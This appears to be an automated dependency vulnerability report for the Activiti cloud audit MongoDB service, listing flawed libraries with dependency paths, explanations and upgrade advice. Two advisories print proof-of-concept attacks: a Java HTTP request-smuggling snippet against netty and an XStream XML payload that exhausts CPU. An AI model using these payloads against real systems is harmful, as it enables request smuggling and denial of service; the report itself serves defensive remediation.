Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.jboss.resteasy:resteasy-client@3.0.21.Final › org.jboss.resteasy:resteasy-jaxrs@3.0.21.Final
Overview
org.jboss.resteasy:resteasy-jaxrs is a JCP specification that provides a Java API for RESTful Web Services over the HTTP protocol.
Affected versions of this package are vulnerable to Cross-site Scripting (XSS). It did not properly handle URL encoding when the RESTEASY003870 exception occurs. An attacker could use this flaw to launch a reflected XSS attack.
Note: The vulnerability still exists in versions 4.0.0.Beta1-5. Beyond that, the vulnerable function was removed from the code, and the versions above are not distributed in Maven Central.
Details
Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as < and > can be coded as > in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
| Type | Origin | Description |
|---|---|---|
| Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
| Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
| DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
| Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?,&,/,<,>and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
Upgrade org.jboss.resteasy:resteasy-jaxrs to version 3.11.1.Final or higher.
References
medium severity
- Vulnerable module: com.querydsl:querydsl-apt
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › com.querydsl:querydsl-apt@4.1.4
Overview
Affected versions of this package are vulnerable to SQL Injection due to missing sanitization when using JPAQuery.orderBy with user provided input.
Remediation
There is no fixed version for com.querydsl:querydsl-apt.
References
medium severity
- Vulnerable module: commons-configuration:commons-configuration
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › commons-configuration:commons-configuration@1.8
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › commons-configuration:commons-configuration@1.8
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › commons-configuration:commons-configuration@1.8
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › commons-configuration:commons-configuration@1.8
Overview
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due several issues in the loading of untrusted configurations. An attacker can cause excessive resource consumption by manipulating the configuration data or introducing unexpected usage patterns. Users affected by this issue are recommended to upgrade to the 2.x version line org.apache.commons:commons-configuration2, which fixes these issues.
Note: This is only exploitable if the application is configured to load untrusted configurations.
Remediation
There is no fixed version for commons-configuration:commons-configuration.
References
medium severity
- Vulnerable module: commons-io:commons-io
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.jboss.resteasy:resteasy-client@3.0.21.Final › org.jboss.resteasy:resteasy-jaxrs@3.0.21.Final › commons-io:commons-io@2.6
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.jboss.resteasy:resteasy-client@3.0.21.Final › org.jboss.resteasy:resteasy-jaxrs@3.0.21.Final › commons-io:commons-io@2.6
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › commons-io:commons-io@2.6Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › commons-io:commons-io@2.6Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http@4.2.7.Final › commons-io:commons-io@2.6Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http2@4.2.7.Final › io.netty:netty-codec-http@4.2.7.Final › commons-io:commons-io@2.6Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http3@4.2.7.Final › io.netty:netty-codec-http@4.2.7.Final › commons-io:commons-io@2.6Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-handler-proxy@4.2.7.Final › io.netty:netty-codec-http@4.2.7.Final › commons-io:commons-io@2.6Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
commons-io:commons-io is a The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.
Affected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') through the XmlStreamReader class. An attacker can cause the application to consume excessive CPU resources by sending specially crafted XML content.
Remediation
Upgrade commons-io:commons-io to version 2.14.0 or higher.
References
medium severity
- Vulnerable module: io.netty:netty-codec-http
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http@4.2.7.Final
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http2@4.2.7.Final › io.netty:netty-codec-http@4.2.7.Final
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http3@4.2.7.Final › io.netty:netty-codec-http@4.2.7.Final
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-handler-proxy@4.2.7.Final › io.netty:netty-codec-http@4.2.7.Final
Overview
io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.
Affected versions of this package are vulnerable to CRLF Injection in HttpRequestEncoder, due to improper sanitization of a URI with line-breaks in the DefaultHttpRequest class. An attacker can manipulate HTTP requests to cause parser desynchronization, request smuggling, and response splitting by including line break characters in requests.
PoC
public static void main(String[] args) {
EmbeddedChannel client = new EmbeddedChannel();
client.pipeline().addLast(new HttpClientCodec());
EmbeddedChannel server = new EmbeddedChannel();
server.pipeline().addLast(new HttpServerCodec());
server.pipeline().addLast(new ChannelInboundHandlerAdapter() {
@Override
public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception {
System.out.println("Processing msg " + msg);
}
});
DefaultHttpRequest request = new DefaultHttpRequest(
HttpVersion.HTTP_1_1,
HttpMethod.GET,
"/s1 HTTP/1.1\r\n" +
"\r\n" +
"POST /s2 HTTP/1.1\r\n" +
"content-length: 11\r\n\r\n" +
"Hello World" +
"GET /s1"
);
client.writeAndFlush(request);
ByteBuf tmp;
while ((tmp = client.readOutbound()) != null) {
server.writeInbound(tmp);
}
}
Remediation
Upgrade io.netty:netty-codec-http to version 4.1.129.Final, 4.2.8.Final or higher.
References
medium severity
- Vulnerable module: org.keycloak:keycloak-authz-client
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-spring-security-adapter@25.0.3 › org.keycloak:keycloak-policy-enforcer@25.0.3 › org.keycloak:keycloak-authz-client@25.0.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-spring-security-adapter@25.0.3 › org.keycloak:keycloak-policy-enforcer@25.0.3 › org.keycloak:keycloak-authz-client@25.0.3
Overview
org.keycloak:keycloak-authz-client is a client API for Keycloak Authz.
Affected versions of this package are vulnerable to Exposure of Sensitive Information Through Environmental Variables through user-configurable URLs.
Exploiting this vulnerability is possible with the configuration of backchannel logout URLs or admin URLs, when including placeholders like ${env.VARNAME} or ${PROPNAME}, which are replaced with actual values during URL processing. An attacker can access sensitive server environment variables and system properties.
Remediation
Upgrade org.keycloak:keycloak-authz-client to version 26.0.4 or higher.
References
medium severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Denial of Service (DoS). This vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.
PoC
<linked-hash-set>
<sun.reflect.annotation.AnnotationInvocationHandler serialization='custom'>
<sun.reflect.annotation.AnnotationInvocationHandler>
<default>
<memberValues class='javax.script.SimpleBindings'>
<map class='javax.script.SimpleBindings' reference='..'/>
</memberValues>
<type>javax.xml.transform.Templates</type>
</default>
</sun.reflect.annotation.AnnotationInvocationHandler>
</sun.reflect.annotation.AnnotationInvocationHandler>
</linked-hash-set>
XStream xstream = new XStream();
xstream.fromXML(xml);
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
References
medium severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). A remote attacker can request data from internal resources that are not publicly available by manipulating the processed input stream.
Note: This vulnerability does not exist running Java 15 or higher, and is only relevant when using XStream's default blacklist.
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.15 or higher.
References
medium severity
- Vulnerable module: io.springfox:springfox-swagger-ui
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger-ui@2.8.0
Overview
io.springfox:springfox-swagger-ui is an Automated JSON API documentation for API's built with Spring
Affected versions of this package are vulnerable to Cross-site Scripting (XSS). This is due to a bypass of a previous XSS vulnerability.
Details
Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as < and > can be coded as > in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
| Type | Origin | Description |
|---|---|---|
| Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
